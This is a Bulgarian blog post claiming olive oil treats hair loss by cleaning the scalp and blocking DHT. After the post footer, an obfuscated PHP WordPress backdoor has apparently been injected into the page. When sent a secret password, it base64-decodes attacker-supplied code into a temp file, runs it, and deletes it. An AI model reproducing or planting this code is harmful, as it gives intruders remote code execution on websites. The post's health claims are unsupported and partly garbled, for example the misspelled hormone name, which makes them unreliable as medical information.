Помага ли зехтинът при косопад? | Косопад

Помага ли зехтинът при косопад?

Не се примирявайте с косопада. Шампоаните и балсама са много важни – могат да направят косата ви по- здрава, но могат и да причинят загубата й. Те понякога съдържат вещества, които може да увреждат кожата на главата. Дори да използвате дълго време даден продукт и да сте доволни, може да развиете алергична реакция.

zehtin

Ако косопадът ви е причинен от шампоана и/или балсама, промяната с по- мека формула на базата на зехтин, може да накара косата отново да расте. Нанесете чист зехтин върху кожата на главата, масажирайте добре и после увийте главата с кърпа или сложете шапка за баня и оставете а подейства поне 1 час, а най- добре цяла нощ. После си измийте косата с лек шампоан, може пак да е на базата на зехтин.

ПОЧИСТВА И ПРЕДПАЗВА ОТ ОБРАЗУВАНЕ НА ДХТ

Зехтинът почиства по естествен начин и може да възпрепятства образуването на ДХТ (дехидротесторен ), който е хормонът, който благоприятства растежа на косми по лицето, но има обратен ефект върху скалпа. ДХТ кара фоликулът да се свие, докато косъмът стане много zehtin-kosaтънък или спре да расте. Зехтинът пречи на производството на ДХТ, като по този начин намалява загубите на коси, причинени от хормона.

ЗДРАВЕ НА СКАЛПА

Зехтинът е богат на антиоксиданти, които забавят стареенето на тялото. Зехтинът помага за възстановяването на здравето на клетките и намалява вредите от химикалите, като така косата започва пак да расте. Антибактериалното му действие помага срещу инфекции, които може да са причината за косопада.

11. март 2014 20:56:05 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}